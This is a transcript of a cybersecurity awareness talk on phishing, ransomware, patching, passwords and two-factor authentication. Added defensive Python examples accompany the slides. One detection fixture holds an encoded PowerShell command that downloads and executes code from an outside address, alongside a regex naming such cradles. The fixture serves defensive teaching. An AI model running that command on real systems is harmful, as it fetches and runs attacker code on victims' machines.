Source: wphfma.org/wp-content/uploads/2016/04/250-pm-stone.pdf
TRANSCRIPT
Cybersecurity 101
Scott Stone, MACS
• IT Partner and CIO for ACT
• 25 Years in the Industry
• Cyber Threat Analyst – From NCFTA
• Trained Ethical Hacker – EC Council
• Certified in:
  • Network Security
  • Emergency Response Planning
  • Cisco, Sophos, Linux, Novell, etc.
Topics to be Covered
• IT Security Trends
• Phishing / Ransomware
• Protecting Your Organization
  • Patching
  • Firewalls
  • Antivirus / AntiMalware
  • Backups
  • Pen Tests / Vulnerability Scans
  • Mobile Devices
  • Other Security Items
  • Policies and Procedures
  • Passwords / Managers / Two-Factor Authentication
Breached Records – First Half of 2015
Breached Records – First Half of 2016
Breached Records – First Half of 2017
Breached Records – First Half of 2018
2017 Breaches by Industry
2018 Breaches by Industry
Breach Incidents by Type – 2017
Breach Incidents by Type – 2018
Breach Incidents by Source – 2017
Breach Incidents by Source – 2018
This Happens Everywhere, Right? – 2017
This Happens Everywhere, Right? – 2018
(Chart slides; only the slide titles are reproduced in the transcript.)
Phishing Attacks
• Phishing uses social engineering, a technique where cyberattackers attempt to fool you into taking an action.
• These attacks often begin with a cyber criminal sending you an email pretending to be from someone or something you know or trust, such as a friend, your bank, or your favorite online store.
• These emails then entice you into taking an action, such as clicking on a link, opening an attachment, or responding to a message.
• Cyber criminals craft these emails to look convincing.
• Still the largest threat IT currently deals with.
Phishing / Spear Phishing
• Was primarily credentials and account access; now more ransomware / cryptoware.
• Increase in the research people are doing prior to sending phishing emails.
• Reduction in the duplication or complexity of actual emails to avoid looking like spam.
• Targeted attachments and subjects based on job role.
• Criminals are patient and thorough because it pays to be.
Phishing – Three Attack Types
1. Direct Money Theft
2. Credential Theft
3. Computer / Network Infection
What do these have in common? They make piles of MONEY!
Phishing Emails – Direct Money Theft (example screenshot)
Phishing Emails – Credential Theft (two example screenshots)
Phishing – Reputational Loss
Good Afternoon All,
This email comes as a warning regarding an email hack that we are experiencing. It has been brought to our attention that our CCO/CFO, Amy Smith, has had her email hacked. Steps are being taken right now to correct the situation.
Should you receive any correspondence from Amy Smith (AS@ABCWealthcom) requesting any kind of information — DO NOT OPEN! Either delete and/or call our office and ask to speak with either Amy or Bob Smith.
We apologize for any inconvenience and are working tirelessly to fix the problem.
Best,
Sue Jackson
Marketing Manager
ABC Wealth Management
Phishing Emails – Ransomware Infection (example screenshot)
Ransomware
Currently Ransomware commonly comes disguised as Email File Attachments:
• Invoice.doc or Invoice.zip
• Fax.doc or Fax.zip
• Voicemail.wav or Voicemail.zip
• IRS Notice.zip
Or Download links:
• UPS / FEDEX / USPS notifications
• Client files to Box, Dropbox, Google Drive, OneDrive
• Tax documents / Wells Fargo Documents
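The lure names above are only the outside of the package; what matters to a gateway rule is the file type behind the name and what an archive actually contains. The following is an added example, not code from the presentation, that scores attachments the way a simple mail-filter rule would: executable extensions, macro-capable Office formats, double extensions such as Voicemail.wav.exe, the right-to-left override trick, and the contents of zip files. The sample attachments, the extension lists and the quarantine threshold are constructed for the example.

```python
"""Triage e-mail attachment names the way a mail gateway rule might.

Added example, not from the slides. Looks at the lures the slide lists
(Invoice.zip, Fax.doc, Voicemail.wav ...) and scores each attachment on
the properties that actually matter: extension, double extensions,
archive contents. Sample attachments are constructed in memory.
"""
import io
import zipfile

# Extensions that execute code when opened on a typical Windows desktop.
EXECUTABLE_EXT = {"exe", "scr", "js", "jse", "vbs", "vbe", "wsf", "hta",
                  "bat", "cmd", "ps1", "lnk", "com", "pif"}
# Office formats that can carry macros.
MACRO_EXT = {"doc", "docm", "xls", "xlsm", "ppt", "pptm", "rtf"}

def _ext_parts(name):
    parts = name.lower().split(".")
    return parts[1:] if len(parts) > 1 else []

def triage_name(name):
    """Return (score, reasons) for a single file name."""
    exts = _ext_parts(name)
    reasons, score = [], 0
    if not exts:
        return 0, reasons
    last = exts[-1]
    if last in EXECUTABLE_EXT:
        score += 10
        reasons.append(f"executable type .{last}")
    if last in MACRO_EXT:
        score += 5
        reasons.append(f"macro-capable document .{last}")
    # Double extension such as Invoice.pdf.exe or Voicemail.wav.js
    if len(exts) >= 2 and last in EXECUTABLE_EXT | MACRO_EXT:
        score += 5
        reasons.append(f"double extension .{exts[-2]}.{last}")
    # Unicode right-to-left override hides the real extension
    if "\u202e" in name:
        score += 10
        reasons.append("RTL override character in name")
    return score, reasons

def triage_attachment(name, data=b""):
    """Score a file; for zip archives, look inside as well."""
    score, reasons = triage_name(name)
    if _ext_parts(name)[-1:] == ["zip"] and data:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    s, r = triage_name(member)
                    if s:
                        score += s
                        reasons.append(f"archive member {member}: " + ", ".join(r))
        except zipfile.BadZipFile:
            score += 3
            reasons.append("archive does not parse")
    return {"name": name, "score": score, "reasons": reasons}

def make_zip(members):
    """Constructed helper: build an in-memory zip of {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n, b in members.items():
            zf.writestr(n, b)
    return buf.getvalue()

# Constructed sample inbox, modelled on the lures the slide lists.
SAMPLE_ATTACHMENTS = [
    ("Invoice.zip", make_zip({"Invoice.js": b"// downloader stub"})),
    ("Fax.doc", b"\xd0\xcf\x11\xe0"),
    ("Voicemail.wav.exe", b"MZ"),
    ("IRS Notice.zip", make_zip({"IRS Notice.pdf": b"%PDF-1.4"})),
    ("report.pdf", b"%PDF-1.4"),
]

def triage_all(attachments=SAMPLE_ATTACHMENTS, threshold=5):
    """Return the attachments whose score reaches the quarantine threshold."""
    results = [triage_attachment(n, d) for n, d in attachments]
    return [r for r in results if r["score"] >= threshold]

if __name__ == "__main__":
    for r in triage_all():
        print(f'{r["name"]:22} score={r["score"]:2}  ' + "; ".join(r["reasons"]))
```

Note that IRS Notice.zip scores zero here because its only member is a PDF; a real gateway would still sandbox it, since the name alone says nothing. The point of the example is that filename heuristics catch the cheap lures and nothing else.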
Ransomware
• 60% of Phishing emails we see lead to Ransomware. 20% each to Credential Theft or Direct Theft.
• Ransomware attacks are on the rise.
• FBI estimates Cyber Criminals will make over $11.5 billion in 2019.
• We have consulted on Ransomware infections for organizations from large hospitals to home businesses.
• Only options are to pay or restore from backups.
• Ransomware always results in downtime and lost productivity.
Ryuk Ransomware
• Ryuk ransomware banks $3.7 million in five months –Engadget 1/13/19
• Local manufacturer hit with 79 BTC ($282,583) ransom
• Crippled their US, Canadian, and UK sites
• Encrypted files on all their servers and their backups
• Attacked them again two months after initial infection
Ryuk Ransomware
• Starts by infecting systems with TrickBot malware (typically through methods like phishing email).
• Uses PowerShell and Remote Desktop Protocol to create backdoors and steal passwords.
• Lets the intruders study their targets to determine the money-making potential.
• They look for the most critical systems and will even pass on launching the Ryuk encryption if the organization isn't large enough.
• They target industries at different times (schools, local government, public housing, manufacturing).
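The chain on this slide (TrickBot foothold, then hands-on PowerShell and RDP, then Ryuk) leaves a recognisable trail in Windows Security events before anything is encrypted. The following is an added example, not from the presentation, that runs simple detection logic over constructed, simplified 4688 (process creation) and 4624 (logon) records: it decodes -EncodedCommand payloads, flags hidden or download-and-execute PowerShell, flags RDP (logon type 10) from anything other than an assumed jump host, and escalates a host that shows both within a time window. Event format, hostnames, addresses and the jump-host address are all assumptions for the example.

```python
"""Spot the TrickBot-to-Ryuk precursors the slide lists in Windows event data.

Added example, not from the slides. Runs simple detection logic over
constructed, simplified Windows Security events: 4688 (process creation)
for encoded/hidden PowerShell, and 4624 logon type 10 (RDP) from hosts
that are not the approved jump servers. Hosts showing both inside a
time window are ranked highest, since that is the hands-on-keyboard
stage the slide describes.
"""
import base64
import re
from datetime import datetime, timedelta

APPROVED_RDP_SOURCES = {"10.0.0.5"}     # assumed jump host; not from the slides
PS_SUSPICIOUS = re.compile(
    r"-(enc|encodedcommand|e)\b|-w(indowstyle)?\s+hidden|downloadstring|iex\b",
    re.IGNORECASE)
WINDOW = timedelta(hours=6)

def encode_ps(cmd):
    """Encode a command the way 'powershell -enc' expects (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16le")).decode()

def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -enc/-e <b64>."""
    m = re.search(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

# Constructed sample events; timestamps, hosts and addresses are fictional.
SAMPLE_EVENTS = [
    {"ts": "2019-03-01T02:10:00", "id": 4688, "host": "FIN-WS07", "user": "jsmith",
     "cmd": "powershell.exe -w hidden -enc "
            + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"ts": "2019-03-01T02:45:00", "id": 4624, "host": "FIN-WS07", "user": "jsmith",
     "logon_type": 10, "src": "203.0.113.40"},
    {"ts": "2019-03-01T03:05:00", "id": 4624, "host": "DC01", "user": "admin",
     "logon_type": 10, "src": "10.0.0.5"},
    {"ts": "2019-03-01T09:00:00", "id": 4688, "host": "HR-WS02", "user": "svc_backup",
     "cmd": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ts": "2019-03-01T09:30:00", "id": 4624, "host": "HR-WS02", "user": "svc_backup",
     "logon_type": 10, "src": "203.0.113.40"},
]

def analyse(events=SAMPLE_EVENTS):
    """Return per-host findings, highest score first."""
    hosts = {}
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        h = hosts.setdefault(ev["host"], {"host": ev["host"], "score": 0, "hits": []})
        if ev["id"] == 4688:
            cmd = ev.get("cmd", "")
            decoded = decode_encoded_command(cmd)
            if PS_SUSPICIOUS.search(cmd) or (decoded and PS_SUSPICIOUS.search(decoded)):
                h["score"] += 5
                h["hits"].append((ts, "ps", "suspicious PowerShell: " + (decoded or cmd)[:60]))
        elif (ev["id"] == 4624 and ev.get("logon_type") == 10
              and ev.get("src") not in APPROVED_RDP_SOURCES):
            h["score"] += 3
            h["hits"].append((ts, "rdp", f"RDP logon from unapproved source {ev['src']}"))
    # Correlation: both behaviours on one host inside the window means escalate.
    for h in hosts.values():
        ps_times = [t for t, k, _ in h["hits"] if k == "ps"]
        rdp_times = [t for t, k, _ in h["hits"] if k == "rdp"]
        if any(abs(p - r) <= WINDOW for p in ps_times for r in rdp_times):
            h["score"] += 10
            h["hits"].append((None, "corr", "PowerShell and RDP on same host within window"))
    return sorted(hosts.values(), key=lambda h: -h["score"])

if __name__ == "__main__":
    for h in analyse():
        print(h["host"], h["score"], [d for _, _, d in h["hits"]])
```

On the constructed data FIN-WS07 ranks first (encoded download cradle plus RDP from an unapproved address within 35 minutes), HR-WS02 gets only the RDP finding, and DC01 is clean because its RDP session came from the jump host. In production the same logic belongs in the SIEM, fed by 4688 with command-line auditing enabled and PowerShell script-block logging, which the slide's "PowerShell on the desktop" item later assumes.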
Ransomware Distribution Methods
• Files Attached to Email
• Common File Transfer Services:
  • Dropbox
  • OneDrive
  • Google Drive
  • LeapFile
  • ShareFile
• What are the risks?
Protecting Yourself
• Be suspicious of attachments and only open those that you were expecting.
• Pause and think about emails that impart a sense of urgency.
• Just because you got an email from your friend does not mean they sent it.
• DO NOT CLICK ON LINKS IN EMAIL.
• Not sure? Forward it to IT.
• Train yourself:
  • https://www.phishingbox.com/phishing-test
  • https://www.opendns.com/phishing-quiz/
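The reason behind "do not click on links in email" is that the text a link shows and the place it goes are two different things, and a lookalike host can carry the real brand name in its left-hand labels. The following is an added example, not from the presentation, that parses an HTML message body and flags anchors whose displayed URL and real destination disagree, or whose host embeds a trusted brand under a different registrable domain. The message body and the brand list are constructed for the example; the two-label "registrable domain" rule is a deliberate simplification that a real tool would replace with the public suffix list.

```python
"""Flag suspicious links in an HTML e-mail body.

Added example (not from the slides): shows why "do not click links in
e-mail" is good advice. Compares the domain a link *displays* with the
domain its href actually points to, and flags lookalike hosts.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample e-mail body; the attacker domains are invented.
SAMPLE_EMAIL_HTML = """
<p>Your Wells Fargo account has been locked.</p>
<p>Please sign in at <a href="http://wellsfargo.com-secure-login.example.net/verify">https://www.wellsfargo.com/</a>
to restore access within 24 hours.</p>
<p>Questions? Visit <a href="https://www.wellsfargo.com/help">https://www.wellsfargo.com/help</a>.</p>
<p><a href="https://dropbox.com.files-share.example.org/doc.zip">Download client files</a></p>
"""

class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> elements."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def registrable_domain(host):
    """Crude 'last two labels' approximation (no public-suffix list)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()

def analyse_links(html, trusted_brands=("wellsfargo.com", "dropbox.com")):
    """Return a finding per anchor that lies about where it goes."""
    parser = _LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        target = urlparse(href).hostname or ""
        reasons = []
        # 1. Displayed URL points somewhere other than the real href.
        if "://" in text:
            shown = urlparse(text).hostname or ""
            if registrable_domain(shown) != registrable_domain(target):
                reasons.append(f"displayed {shown} but goes to {target}")
        # 2. Brand name embedded in a host whose registrable domain is not the brand.
        for brand in trusted_brands:
            if brand in target and registrable_domain(target) != brand:
                reasons.append(f"lookalike host uses '{brand}' but is {registrable_domain(target)}")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in analyse_links(SAMPLE_EMAIL_HTML):
        print(f["href"], "->", "; ".join(f["reasons"]))
```

The second anchor in the sample, the genuine help page, produces no finding; the other two do. Mail gateways and browser extensions apply the same comparison, and the manual equivalent is hovering over the link, which is what "forward it to IT" lets someone else do for you.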
Phishing – Protecting Yourself
• Enable two-factor authentication – O365, Google Authenticator, Security Key, SMS (SMS is the weakest of these; see SIM jacking under Mobile Devices).
• Train your employees and yourself – KnowBe4, Wombat, Sophos.
• Use a quality email provider – Office 365, Gmail, ProtonMail.
Patching
What is patching?
Why is it important?
What do I need to do?
Patching
• A Fully Patched Windows 7 or 10 computer was immune to 97% of all active attacks in 2018.
• The software industry is moving to an automatic patching model. Hardware and IOT are going to be slow to adopt this approach.
• Most Firewalls will not fully patch themselves automatically.
• A software inventory system is a key component to tracking unpatched systems.
• Microsoft automatic patching is not reliable. (WSUS)
• All software is vulnerable – e.g., WinRAR.
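The inventory point is the one that does the work: you cannot patch what you do not know you have, and third-party products such as WinRAR never show up in WSUS at all. The following is an added example, not from the presentation, that takes an inventory export and a minimum-version baseline and lists what is out of date, comparing versions component by component so that 5.70 is correctly newer than 5.9 (a plain string comparison gets that backwards). The inventory rows, host names and the minimum versions are assumptions constructed for the example, not a vendor advisory table; the example also reports products present in the inventory that have no baseline at all, which is the gap that usually bites.

```python
"""Find unpatched software from an inventory export.

Added example, not from the slides. Compares a constructed inventory
(host, product, version) against a minimum-version table and reports
what still needs patching. Version strings are compared numerically per
component, so 5.70 > 5.9 is handled correctly (string comparison gets
that wrong). The minimum versions here are assumed for the example.
"""
import re

def parse_version(s):
    """'5.70.1 beta' -> (5, 70, 1); non-numeric trailing text is ignored."""
    nums = re.findall(r"\d+", s)
    return tuple(int(n) for n in nums) if nums else (0,)

def version_lt(a, b):
    """True if version a is older than b; shorter tuples are padded with zeros."""
    pa, pb = parse_version(a), parse_version(b)
    n = max(len(pa), len(pb))
    return pa + (0,) * (n - len(pa)) < pb + (0,) * (n - len(pb))

# Assumed baseline for the example (not a vendor advisory table).
MINIMUM_VERSIONS = {
    "winrar": "5.70",
    "google chrome": "72.0.3626.121",
    "adobe acrobat reader dc": "19.10.20069",
}

# Constructed inventory, as a CSV-like block an inventory tool might export.
SAMPLE_INVENTORY = """host,product,version
FIN-WS07,WinRAR,5.61
FIN-WS07,Google Chrome,72.0.3626.121
HR-WS02,WinRAR,5.70
HR-WS02,Adobe Acrobat Reader DC,19.010.20069
RECEPTION-PC,Google Chrome,71.0.3578.98
RECEPTION-PC,Notepad++,7.6
"""

def _rows(inventory_csv):
    lines = inventory_csv.strip().splitlines()[1:]          # skip header
    return [[c.strip() for c in l.split(",", 2)] for l in lines if l.strip()]

def find_unpatched(inventory_csv=SAMPLE_INVENTORY, minimums=MINIMUM_VERSIONS):
    """Return [(host, product, installed, required)] for out-of-date entries."""
    findings = []
    for host, product, version in _rows(inventory_csv):
        required = minimums.get(product.lower())
        if required is None:
            continue            # no baseline; surfaced by coverage_gaps()
        if version_lt(version, required):
            findings.append((host, product, version, required))
    return findings

def coverage_gaps(inventory_csv=SAMPLE_INVENTORY, minimums=MINIMUM_VERSIONS):
    """Products seen in the inventory with no baseline: the tracking hole."""
    products = {product for _, product, _ in _rows(inventory_csv)}
    return sorted(p for p in products if p.lower() not in minimums)

if __name__ == "__main__":
    for host, product, have, need in find_unpatched():
        print(f"{host}: {product} {have} < {need}")
    print("no baseline:", coverage_gaps())
```

Two rows come back as unpatched and Notepad++ is reported as untracked. The useful habit is to treat that second list as a work item, because a product with no baseline is invisible to every patch report you run.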
Firewalls
• Unified Threat Management (UTM) Firewalls at every Internet Connection
• UTM incorporates:
  • Antivirus Scanning
  • Country Blocking / Geo IP Filtering
  • Content Filtering
  • Intrusion Detection
  • Intrusion Prevention
  • Application Control / Blocking
• Internal Firewalls for Finance / EHR / HR
Antivirus / Antimalware
• Must be centrally managed to be effective.
• Should automatically alert IT of infections.
• Heuristic AV clients are better than pattern-based.
• AntiMalware technology can work with your Firewall to limit access after an infection.
• Should be layered – Firewall / Server / PC.
• AI starting to impact this market.
Backups
• Must include off-site or cloud backups.
• Need to be disconnected from the network.
• Restoration time is a business decision.
• Local copies should be part of the strategy.
• Needs to be encrypted – who holds the keys?
• Retention should be a primary part of the backup strategy.
Pen Test / Vulnerability Scans
• Penetration testing, also called pen testing or ethical hacking, is the practice of testing a computer system, network, or web application to find security vulnerabilities that an attacker could exploit.
• Vulnerability scanning is an inspection of the potential points of exploit on a computer or network to identify security holes.
Mobile Device Management
• The next target for thieves.
• SIM jacking is a real threat now.
• Corporate assets vs personal devices.
• Security in this space is moving quickly.
• iPhone vs Android?
Mobile Devices – Personal Best Practices
• Keep it updated (iOS / Nexus).
• Use a strong PIN / passcode.
• Be careful of the apps you install.
• Dispose of old devices properly.
• Be cautious of what you plug it into to charge.
• Do not open attachments you do not need to read on your phone.
Other Security Concerns
• PowerShell on the desktop
• VLANs are not real security
• Local Admin rights to the computer
• IT Staff running as Administrators
• VPNs for Vendors (HVAC, Copiers, Security)
• Network Managed Services Providers
Policies and Procedures
• What should you have?
  • Risk Analysis / Risk Assessment
  • Incident Response Plan / Log
  • Disaster Recovery Plan
• Other items:
  • Privacy Policy / Assessment
  • Security Policy / Assessment
Passwords and Two-Factor Authentication
1. Password Best Practices Review
2. Password Managers, Haystacking, Passphrases
3. Two-Factor – Types, Uses, Limitations, Benefits
Passwords: Protecting Yourself
• Enable Two-Factor Authentication.
• Use a Password Manager such as LastPass.
• Do not reuse passwords for important sites.
Password Managers
A password manager is a software application or hardware device that helps a user store and organize passwords. Password managers usually store passwords encrypted, requiring the user to create a master password: a single, ideally very strong password which grants the user access to their entire password database.
Examples:
• LastPass
• 1Password
• KeePass
• Lenovo Fingerprint Manager
• HP ProtectTools
Excel as a Password Manager?
• Better than writing them down.
• Must set a strong master password.
• Be careful how you transfer it or store it.
• Backups are an issue.
Password Haystacking
• Every password you use can be thought of as a needle hiding in a haystack. After all searches of common passwords and dictionaries have failed, an attacker must resort to a “brute force” search – ultimately trying every possible combination of letters, numbers, and then symbols until the combination you chose is discovered.
• Example: LinkedIn4-=-=-=
• Which of the following two passwords is stronger, more secure, and more difficult to crack?
  • D0g.....................
  • PrXyc.N(n4k77#L!eVdAfp9
• Caveat: padding only helps against a blind brute-force search. If the attacker's rule set already includes “short word plus repeated padding”, the padded password is the weaker of the two.
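The question on the slide is easier to settle with numbers than by eye. The following is an added example, not from the presentation, that works the haystack model through: it derives the alphabet an attacker must assume from the character classes a password uses, sums the search space over every length up to the password's own, converts that to years at an assumed guess rate, and then shows the other side of the argument by computing how small the space becomes once the attacker knows the "word plus repeated padding" pattern. The two candidate passwords are the slide's; the guess rate is an assumption.

```python
"""Work through the haystack question on the slide.

Added example, not from the slides. Computes the exhaustive search space
the haystack model assigns to a password (every combination of the
character classes it uses, at every length up to its own), and the time
an attacker needs at a given guess rate. It also shows the caveat: once
the padding *pattern* is known, the padded password collapses to a tiny
search space, so padding only helps against blind brute force.
"""
import string

CLASSES = [
    ("lower", set(string.ascii_lowercase)),
    ("upper", set(string.ascii_uppercase)),
    ("digit", set(string.digits)),
    ("symbol", set(string.punctuation + " ")),
]

PADDED = "D0g" + "." * 21                 # the slide's first candidate
RANDOM = "PrXyc.N(n4k77#L!eVdAfp9"        # the slide's second candidate

def alphabet_size(password):
    """Size of the alphabet an attacker must assume, given the classes present."""
    return sum(len(chars) for _, chars in CLASSES if any(c in chars for c in password))

def search_space(password):
    """Number of guesses to exhaust all lengths up to len(password)."""
    a = alphabet_size(password)
    return sum(a ** n for n in range(1, len(password) + 1))

def crack_time_years(password, guesses_per_second):
    """Worst-case exhaustive search time; assumed offline rate, not a real benchmark."""
    return search_space(password) / guesses_per_second / (365 * 24 * 3600)

def pattern_space(core, padding_chars, max_padding):
    """Search space once the attacker knows the 'word + repeated padding' rule:
    exhaustive over the core only, times the padding choices."""
    return search_space(core) * len(padding_chars) * max_padding

def compare(p1=PADDED, p2=RANDOM, rate=1e12):
    """Haystack figures for both candidates at an assumed rate of guesses/second."""
    return {p: {"alphabet": alphabet_size(p), "length": len(p),
                "space": search_space(p), "years": crack_time_years(p, rate)}
            for p in (p1, p2)}

if __name__ == "__main__":
    for p, info in compare().items():
        print(f"{p:26} alphabet={info['alphabet']} len={info['length']} "
              f"years={info['years']:.3e}")
    print("padded, pattern known:", pattern_space("D0g", ".", 21))
```

Under the blind model the padded password wins because it is one character longer over the same 95-symbol alphabet. Against an attacker whose rules append repeated punctuation to a short word, the same password falls inside a search space of a few million guesses, which is why the slide's later advice is a password manager generating long random strings rather than clever padding.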
Passphrases
• Instead of a password consider using a passphrase.
• Examples:
  • MydogsnameisRex
  • Securityisnotthathard
  • Ilove2learn!
• Longer passwords are better passwords.
• Avoid phrases built from facts about you (a pet's name) or common sayings; cracking tools try those first.
• Use a Password Manager to create long, secure, unique passwords so you do not need to remember every one.
Ways to Stay Safe – Passwords
• Don’t reuse passwords.
• Don’t type your password into a public-use machine. If you do have to, change it ASAP.
• Use a machine other than your kid’s gaming machine to check mail or log into Firm resources.
• Use a Password Manager.
• Use Password Haystacking.
• Use Passphrases instead of Passwords.
• If you hear about a breach, change your password.
• Always be diligent about typing in passwords where people can see you type them in.
• Upgrade your operating system and keep it updated.
Two-Factor Authentication / Biometrics
Two-Factor Authentication means:
Something You Know (Password)
+
Something You Have (RFID Badge, SMS Message, Time-Based One-Time Password, Hardware Key – U2F)
OR
Something You Are (Fingerprint, Retinal Scan, Palm Scanner, Facial Recognition, Voice Recognition)
Two-Factor Authentication / Biometrics
• Two-Factor Authentication aka 2FA or Multifactor Authentication
• Examples:
  • PIN texted to your cell
  • Google Authenticator
  • RSA SecurID
  • Mobile app authentication
• Biometrics:
  • Fingerprint scanner (laptop, iPhone, etc.)
  • Retinal scanner
  • Hand geometry
  • Facial recognition
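The "something you have" in Google Authenticator, Microsoft Authenticator and the other apps on the next slide is a shared seed, and the six-digit code is a time-based one-time password computed from it. The following is an added example, not from the presentation, that implements HOTP (RFC 4226) and TOTP (RFC 6238) from the standard library, verifies a code with one step of clock drift either side, and decodes the base32 seed format the QR code carries. The seed used is the published RFC test seed, so the output can be checked against the RFC's own vectors; everything else (step size, drift window) is the usual default.

```python
"""Generate and verify time-based one-time passwords (RFC 6238 / HOTP RFC 4226).

Added example, not from the slides. This is what Google Authenticator,
Microsoft Authenticator and FreeOTP compute: HMAC over a moving time
counter, dynamically truncated to 6 digits. The verifier accepts one
step of clock drift either side. A code is only as secret as the shared
seed, which is one of the limitations the slides allude to.
"""
import base64
import hashlib
import hmac
import struct
import time

def hotp(secret, counter, digits=6, digestmod=hashlib.sha1):
    """RFC 4226: HMAC(secret, counter) -> dynamic truncation -> decimal code."""
    msg = struct.pack(">Q", counter)                 # 8-byte big-endian counter
    mac = hmac.new(secret, msg, digestmod).digest()
    offset = mac[-1] & 0x0F                          # low nibble of last byte
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

def totp(secret, at=None, step=30, digits=6, digestmod=hashlib.sha1):
    """RFC 6238: the counter is the number of 30 s steps since the Unix epoch."""
    t = int(time.time() if at is None else at)
    return hotp(secret, t // step, digits, digestmod)

def verify_totp(secret, code, at=None, step=30, drift=1):
    """Accept the code for the current step or +/- drift steps; constant-time compare."""
    t = int(time.time() if at is None else at)
    for d in range(-drift, drift + 1):
        if hmac.compare_digest(hotp(secret, t // step + d), code):
            return True
    return False

def seed_from_base32(s):
    """Authenticator apps take the seed as base32 (the text inside the QR code)."""
    s = s.strip().replace(" ", "").upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))

# Test seed from RFC 6238 appendix B (also the RFC 4226 test seed).
RFC6238_SEED = b"12345678901234567890"

if __name__ == "__main__":
    print("HOTP counter 0:", hotp(RFC6238_SEED, 0))            # 755224 per RFC 4226
    print("TOTP at T=59, 8 digits:", totp(RFC6238_SEED, at=59, digits=8))  # 94287082
    print("TOTP now:", totp(RFC6238_SEED))
```

Two practical consequences follow from the code. The server must store the seed, so a breach of the authentication database hands out every user's second factor, and the drift window means a captured code stays valid for roughly a minute; both are why a hardware key (U2F) on the previous slide is a stronger "something you have" than a TOTP app.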
Best Apps For Two Factor
• Google Authenticator
• Duo Mobile
• Microsoft Authenticator
• FreeOTP
What about Security Questions?
Such as:
• Mother’s maiden name
• City you were born in
• Street you grew up on
• Best friend’s name
• Father’s middle name
Terrible – answers available on social media.
Physical Loss of Paper!
• Shredding
• Printing and Faxing
• Copies Sitting Out
• Secure Print & eFax
• Electronic Device Memory (copiers)
Think Low-Tech: 27% of breach incidents were related to paper!
Where are you spending too much?
• Support Contracts – Cisco, Microsoft, Dell, HP
• Data / Phone – Have you renegotiated in the last 24 months?
• Expertise – IT in general, Exchange
• EHR – On premise vs cloud?
• Data Centers – What is actually there?
• Hosted Services – Journaling, portals, etc.
IT Security Basics
• Centralized antivirus on every workstation and server, with active IT notification
• Patch management for every PC and server, both Microsoft and third party
• Firewall protection with an up-to-date product
• Good password hygiene
• Solid backups, including cloud or off-site storage
QUESTIONS?
Scott Stone, MACS
Partner – IT Services
voice: 724.658.1565 or 800.452.3003
e-mail: [email protected]
Connect with ACT: